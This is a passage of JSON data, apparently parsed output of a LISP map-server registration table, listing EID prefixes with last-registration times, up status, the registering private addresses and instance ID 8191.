"last_register": "13:54:40",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.1e8d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1ea2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.1ea5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.1fbc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"04eb.40ff.1fcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.1fdd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.1f05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.1f0b/48": {
"last_register": "01:13:45",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.1f2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.20d9/48": {
"last_register": "14:07:24",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.20f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"04eb.40ff.20fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"04eb.40ff.2031/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.2052/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.2061/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.207c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"04eb.40ff.2097/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.21cc/48": {
"last_register": "00:32:44",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.21e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.2124/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.212a/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.21b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.22e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.22ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.22f8/48": {
"last_register": "10:50:13",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.2259/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"04eb.40ff.2283/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.23fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.2304/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"04eb.40ff.2310/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2313/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.235e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.2364/48": {
"last_register": "19:50:00",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.237c/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.24c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.2400/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.2415/48": {
"last_register": "01:22:49",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.241e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.2526/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.26c4/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.26c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.26df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2694/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.2715/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.274e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.2751/48": {
"last_register": "04:28:40",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.29d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.2af9/48": {
"last_register": "04:39:52",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.2a0f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.2bfb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2b6b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2b80/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.2cfa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.2c4c/48": {
"last_register": "13:00:56",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.2d00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.2d03/48": {
"last_register": "00:24:02",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.2d4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2d5a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2ebf/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.2fc1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.2fc7/48": {
"last_register": "10:57:02",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.2fe8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2ff1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.2f2e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.2f49/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.2f4f/48": {
"last_register": "02:35:00",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.2f55/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.2f5b/48": {
"last_register": "05:25:08",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.2f61/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.2f82/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.2f94/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.2fb5/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.30c0/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.30cf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.305a/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.30ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.31fb/48": {
"last_register": "02:11:44",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.3102/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.3123/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.32c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.321f/48": {
"last_register": "22:40:42",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.3327/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.3354/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.33b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.34b9/48": {
"last_register": "11:09:51",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.34ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"04eb.40ff.3402/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.342f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.343e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.3444/48": {
"last_register": "04:54:48",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.347d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.35be/48": {
"last_register": "00:57:09",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.35c4/48": {
"last_register": "1d02h",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.35d3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.35e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.35eb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.3522/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.3525/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.3540/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.356a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.3579/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.35a6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.35ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.363c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.3669/48": {
"last_register": "04:58:48",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.3672/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.3675/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.3690/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.36b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.37c8/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.3702/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.3711/48": {
"last_register": "19:06:15",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.3744/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.3801/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.3831/48": {
"last_register": "00:03:50",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.3849/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"04eb.40ff.3852/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.3939/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.3957/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.395d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.3972/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.3975/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.398d/48": {
"last_register": "03:43:28",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.3a71/48": {
"last_register": "07:38:54",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.3bd9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.3bf1/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.3ccc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.3cdb/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9708/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"04eb.40ff.970e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.971a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.972c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"04eb.40ff.9735/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9738/48": {
"last_register": "06:15:18",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.974a/48": {
"last_register": "07:53:51",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.98d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.98d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.98eb/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9816/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8191,
},
"04eb.40ff.9819/48": {
"last_register": "11:30:19",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.981f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9822/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9837/48": {
"last_register": "08:42:51",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.983a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9855/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9882/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9897/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"04eb.40ff.98a9/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.99cc/48": {
"last_register": "00:20:52",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.99e4/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9900/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9912/48": {
"last_register": "08:20:48",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9918/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.9924/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.992a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.992d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.9942/48": {
"last_register": "05:31:32",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.997b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.997e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.999f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.99a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.99ae/48": {
"last_register": "09:16:51",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.99b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9ac8/48": {
"last_register": "11:54:10",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.9ae9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.9afb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"04eb.40ff.9a38/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9a3e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.9a41/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9a47/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9a86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9ab3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9bc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9bcd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.9bd0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.9bd3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.9bd6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9beb/48": {
"last_register": "01:19:34",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.9bee/48": {
"last_register": "04:48:46",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9bf1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9bf4/48": {
"last_register": "02:29:24",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.9bfd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.9b13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.9b4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"04eb.40ff.9b55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.9b64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.9b73/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9b8b/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9b91/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.9b9d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9ba6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9bb5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.9cc3/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9cf0/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9c00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"04eb.40ff.9c2d/48": {
"last_register": "06:44:42",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"04eb.40ff.9c33/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9c4e/48": {
"last_register": "10:46:48",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9c57/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9d1d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9d32/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"04eb.40ff.9d35/48": {
"last_register": "10:16:58",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9d44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"04eb.40ff.9d56/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.9d59/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9f12/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"04eb.40ff.9f18/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"04eb.40ff.9f2a/48": {
"last_register": "2w1d",
